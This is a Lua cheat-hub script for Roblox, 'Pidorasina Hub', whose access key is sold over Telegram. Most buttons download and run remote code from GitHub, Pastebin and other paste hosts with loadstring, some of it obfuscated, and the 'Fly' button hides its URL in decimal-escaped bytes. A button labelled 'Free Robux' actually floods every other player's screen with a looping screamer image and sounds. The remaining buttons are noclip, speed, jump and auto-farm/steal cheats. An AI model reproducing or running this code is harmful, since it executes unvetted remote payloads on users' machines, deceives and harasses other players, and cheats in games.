local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({
   Name = "💥Pidorasina Hub💥",
   LoadingTitle = "Pidorasina Hub",
   LoadingSubtitle = "by chiter_new228",
   ConfigurationSaving = {
      Enabled = false,
      FolderName = nil, -- Create a custom folder for your hub/game
      FileName = "Big Hub"
   },
   Discord = {
      Enabled = false,
      Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ABCD would be ABCD
      RememberJoins = true -- Set this to false to make them join the discord every time they load it up
   },
   KeySystem = true, -- Set this to true to use our key system
   KeySettings = {
      Title = "PidorasinaHub| Key",
      Subtitle = "You can buy the key from the developer in telegram @PidorasinaHub",
      Note = "It's safe and fast",
      FileName = "PidorasinaHubKey", -- It is recommended to use something unique as other scripts using Rayfield may overwrite your key file
      SaveKey = false, -- The user's key will be saved, but if you change the key, they will be unable to use your script
      GrabKeyFromSite = true, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
      Key = {"https://pastebin.com/raw/NEpyAbnS"} -- List of keys that will be accepted by the system, can be RAW file links (pastebin, github etc) or simple strings ("hello","key22")
   }
})

local MainTab = Window:CreateTab("🏠Home🏠", nil) -- Title, Image
local MainSection = MainTab:CreateSection("💥Universal Scripts💥")

Rayfield:Notify({
   Title = "Hello!👋",
   Content = "PidorasinaHub Loaded.Enjoy the game💜 ",
   Duration = 5,
   Image = nil,
   Actions = { -- Notification Buttons
      Ignore = {
         Name = "Okay!",
         Callback = function()
         print("The user tapped Okay!")
      end
   },
},
})

local Button = MainTab:CreateButton({
   Name = "DeX",
   Callback = function()
   loadstring(game:HttpGet("https://raw.githubusercontent.com/Babyhamsta/RBLX_Scripts/main/Universal/BypassedDarkDexV3.lua", true))()
   end,
})

local Button = MainTab:CreateButton({
   Name = "∞ InfinityYield ∞",
   Callback = function()
   loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
   end,
})

local Button = MainTab:CreateButton({
   Name = "AnimattionsGui",
   Callback = function()
   loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/nexas", true))()
   end,
})

local Button = MainTab:CreateButton({
   Name = "Shaders",
   Callback = function()
   loadstring(game:HttpGet(('https://pastefy.app/xXkUxA0P/raw'),true))()
   end,
})

local Button = MainTab:CreateButton({
   Name = "WalkOnWalls",
   Callback = function()
  loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/WalkOnWalls", true))()
   end,
})

local Button = MainTab:CreateButton({
   Name = "Fly",
   Callback = function()
  loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
   end,
})

local Button = MainTab:CreateButton({
   Name = "Noclip",
   Callback = function()
  local Workspace = game:GetService("Workspace")
local CoreGui = game:GetService("CoreGui")
local Players = game:GetService("Players")
local Noclip = Instance.new("ScreenGui")
local BG = Instance.new("Frame")
local Title = Instance.new("TextLabel")
local Toggle = Instance.new("TextButton")
local StatusPF = Instance.new("TextLabel")
local Status = Instance.new("TextLabel")
local Credit = Instance.new("TextLabel")
local Plr = Players.LocalPlayer
local Clipon = false

Noclip.Name = "Noclip"
Noclip.Parent = game.CoreGui

BG.Name = "BG"
BG.Parent = Noclip
BG.BackgroundColor3 = Color3.new(0.0980392, 0.0980392, 0.0980392)
BG.BorderColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BG.BorderSizePixel = 2
BG.Position = UDim2.new(0.149479166, 0, 0.82087779, 0)
BG.Size = UDim2.new(0, 210, 0, 127)
BG.Active = true
BG.Draggable = true

Title.Name = "Title"
Title.Parent = BG
Title.BackgroundColor3 = Color3.new(0.266667, 0.00392157, 0.627451)
Title.BorderColor3 = Color3.new(0.180392, 0, 0.431373)
Title.BorderSizePixel = 2
Title.Size = UDim2.new(0, 210, 0, 33)
Title.Font = Enum.Font.Highway
Title.Text = "Noclip"
Title.TextColor3 = Color3.new(1, 1, 1)
Title.FontSize = Enum.FontSize.Size32
Title.TextSize = 30
Title.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373)
Title.TextStrokeTransparency = 0

Toggle.Parent = BG
Toggle.BackgroundColor3 = Color3.new(0.266667, 0.00392157, 0.627451)
Toggle.BorderColor3 = Color3.new(0.180392, 0, 0.431373)
Toggle.BorderSizePixel = 2
Toggle.Position = UDim2.new(0.152380958, 0, 0.374192119, 0)
Toggle.Size = UDim2.new(0, 146, 0, 36)
Toggle.Font = Enum.Font.Highway
Toggle.FontSize = Enum.FontSize.Size28
Toggle.Text = "Toggle"
Toggle.TextColor3 = Color3.new(1, 1, 1)
Toggle.TextSize = 25
Toggle.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373)
Toggle.TextStrokeTransparency = 0

StatusPF.Name = "StatusPF"
StatusPF.Parent = BG
StatusPF.BackgroundColor3 = Color3.new(1, 1, 1)
StatusPF.BackgroundTransparency = 1
StatusPF.Position = UDim2.new(0.314285725, 0, 0.708661377, 0)
StatusPF.Size = UDim2.new(0, 56, 0, 20)
StatusPF.Font = Enum.Font.Highway
StatusPF.FontSize = Enum.FontSize.Size24
StatusPF.Text = "Status:"
StatusPF.TextColor3 = Color3.new(1, 1, 1)
StatusPF.TextSize = 20
StatusPF.TextStrokeColor3 = Color3.new(0.333333, 0.333333, 0.333333)
StatusPF.TextStrokeTransparency = 0
StatusPF.TextWrapped = true

Status.Name = "Status"
Status.Parent = BG
Status.BackgroundColor3 = Color3.new(1, 1, 1)
Status.BackgroundTransparency = 1
Status.Position = UDim2.new(0.580952346, 0, 0.708661377, 0)
Status.Size = UDim2.new(0, 56, 0, 20)
Status.Font = Enum.Font.Highway
Status.FontSize = Enum.FontSize.Size14
Status.Text = "off"
Status.TextColor3 = Color3.new(0.666667, 0, 0)
Status.TextScaled = true
Status.TextSize = 14
Status.TextStrokeColor3 = Color3.new(0.180392, 0, 0.431373)
Status.TextWrapped = true
Status.TextXAlignment = Enum.TextXAlignment.Left

Credit.Name = "Credit"
Credit.Parent = BG
Credit.BackgroundColor3 = Color3.new(1, 1, 1)
Credit.BackgroundTransparency = 1
Credit.Position = UDim2.new(0.195238099, 0, 0.866141737, 0)
Credit.Size = UDim2.new(0, 128, 0, 17)
Credit.Font = Enum.Font.SourceSans
Credit.FontSize = Enum.FontSize.Size18
Credit.Text = "Created by KingLuna"
Credit.TextColor3 = Color3.new(1, 1, 1)
Credit.TextSize = 16
Credit.TextStrokeColor3 = Color3.new(0.196078, 0.196078, 0.196078)
Credit.TextStrokeTransparency = 0
Credit.TextWrapped = true

Toggle.MouseButton1Click:connect(function()
	if Status.Text == "off" then
		Clipon = true
		Status.Text = "on"
		Status.TextColor3 = Color3.new(0,185,0)
		Stepped = game:GetService("RunService").Stepped:Connect(function()
			if not Clipon == false then
				for a, b in pairs(Workspace:GetChildren()) do
                if b.Name == Plr.Name then
                for i, v in pairs(Workspace[Plr.Name]:GetChildren()) do
                if v:IsA("BasePart") then
                v.CanCollide = false
                end end end end
			else
				Stepped:Disconnect()
			end
		end)
	elseif Status.Text == "on" then
		Clipon = false
		Status.Text = "off"
		Status.TextColor3 = Color3.new(170,0,0)
	end
end)
   end,
})


local Button = MainTab:CreateButton({
   Name = "🤑Free Robux🤑",
   Callback = function()
  local s = Instance.new("Sound") 
 
s.Name = "Name" 
s.SoundId = "rbxassetid://2672209057" 
s.Volume = 7 
s.Looped = true 
s.archivable = false 
 
s.Parent = game.Workspace 
 
wait(1) 
 
s:play()
discord=Instance.new("Hint")
discord.Text = "you got rick rolled!"
discord.Parent = game.Workspace
local me = "DeadDefense" -- You don't get jumpscared.
while wait() do
for i,v in pairs(game.Players:GetPlayers()) do
       if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
               spawn(function()
                       local newgui = Instance.new("ScreenGui",v.PlayerGui)
                       newgui.Name = "Screamer"
                       local newimage = Instance.new("ImageLabel",newgui)
                       newimage.Image = "http://www.roblox.com/asset/?id=839013297"
                       newimage.Size = UDim2.new(1,0,1,0)
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://1662"
                       s.Volume = 1
                       s.Looped = true
                       s:Play()
                       print("Screamed "..v.Name)
                       while wait() do
                               newimage.ImageColor3 = Color3.new(math.random(1,255)/255,math.random(1,255)/255,math.random(1,255)/255)
                               wait()
                               newimage.ImageColor3 = Color3.new(1,1,1)
                       end
               end)
       end
end
end
   end,
})

local MainSection = MainTab:CreateSection("💥Speed/Jump Hack💥")


local Button = MainTab:CreateButton({
   Name = "SpeedHack",
   Callback = function()
   game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 250
   end,
})

local Button = MainTab:CreateButton({
   Name = "NormalSpeed",
   Callback = function()
   game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 20
   end,
})

local Button = MainTab:CreateButton({
   Name = "JumpHack",
   Callback = function()
   game.Players.LocalPlayer.Character.Humanoid.JumpPower = 250
   end,
})

local Button = MainTab:CreateButton({
   Name = "NormalJump",
   Callback = function()
   game.Players.LocalPlayer.Character.Humanoid.JumpPower = 45
   end,
})

local ScriptTab = Window:CreateTab("📑Scripts📑", nil) -- Title, Image
local MainSection = ScriptTab:CreateSection("🚢Build a Boat🚢")

local Button = ScriptTab:CreateButton({
   Name = "AutoFarm and More",
   Callback = function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/max2007killer/script-quest-1-2-3/main/lua.lua"))()
   end,
})

local Button = ScriptTab:CreateButton({
   Name = "AutoBuild and Steal",
   Callback = function()
   loadstring(game:HttpGet(("https://raw.githubusercontent.com/max2007killer/auto-build-not-limit/main/buildaboatv2obs.txt"),true))()
   end,
})

local MainSection = ScriptTab:CreateSection("⚽Blade Ball⚽")

local Button = ScriptTab:CreateButton({
   Name = "Auto Parry",
   Callback = function()
   loadstring(game:HttpGet("https://raw.githubusercontent.com/PawsThePaw/Plutonium.AA/main/Plutonium.Loader.lua", true))()
   end,
})

local MainSection = ScriptTab:CreateSection("🍓Blox Fruits🍓")

local Button = ScriptTab:CreateButton({
   Name = "AutoFarm",
   Callback = function()
   loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3b2169cf53bc6104dabe8e19562e5cc2.lua"))()
   end,
})

local MainSection = ScriptTab:CreateSection("👻Evade👻")

local Button = ScriptTab:CreateButton({
   Name = "Evade Gui",
   Callback = function()
   loadstring(game:HttpGet('https://raw.githubusercontent.com/Jimmper/Robloxscripts/main/obf_ijyV31z27684kpX3UZru9jXcm6UcjCbQyA8el5xmOsYPJ1wwwym70XBni5NRkAAu.lua'))()
   end,
})

local MainSection = ScriptTab:CreateSection("💲Da Hood💲"))

local Button = ScriptTab:CreateButton({
   Name = "Da Hood Gui",
   Callback = function()
   loadstring(game:HttpGet("https://raw.githubusercontent.com/spacexrandom/Lua/main/DaHood", true))()
   end,
})

local MainSection = ScriptTab:CreateSection("🪠Skibidi Toilet Tower Defense🪠")

local Button = ScriptTab:CreateButton({
   Name = "Skibidi Toilet Tower Defense GUI",
   Callback = function()
   loadstring(game:HttpGet("https://pastebin.com/raw/pdhvLJsE"))()
   end,
})

local Button = ScriptTab:CreateButton({
   Name = "Skibidi Toilet Tower Defense SCAM",
   Callback = function()
   loadstring(game:HttpGet('https://raw.githubusercontent.com/JustWarriorGG/TTDhub/main/mainhub.lua'))()
   end,
})

local MainSection = ScriptTab:CreateSection("🔪MM2🔪")

local Button = ScriptTab:CreateButton({
   Name = "MM2 Gui",
   Callback = function()
   loadstring(game:HttpGet("https://raw.githubusercontent.com/Drifter0507/scripts/main/mm2", true))()
   end,
})

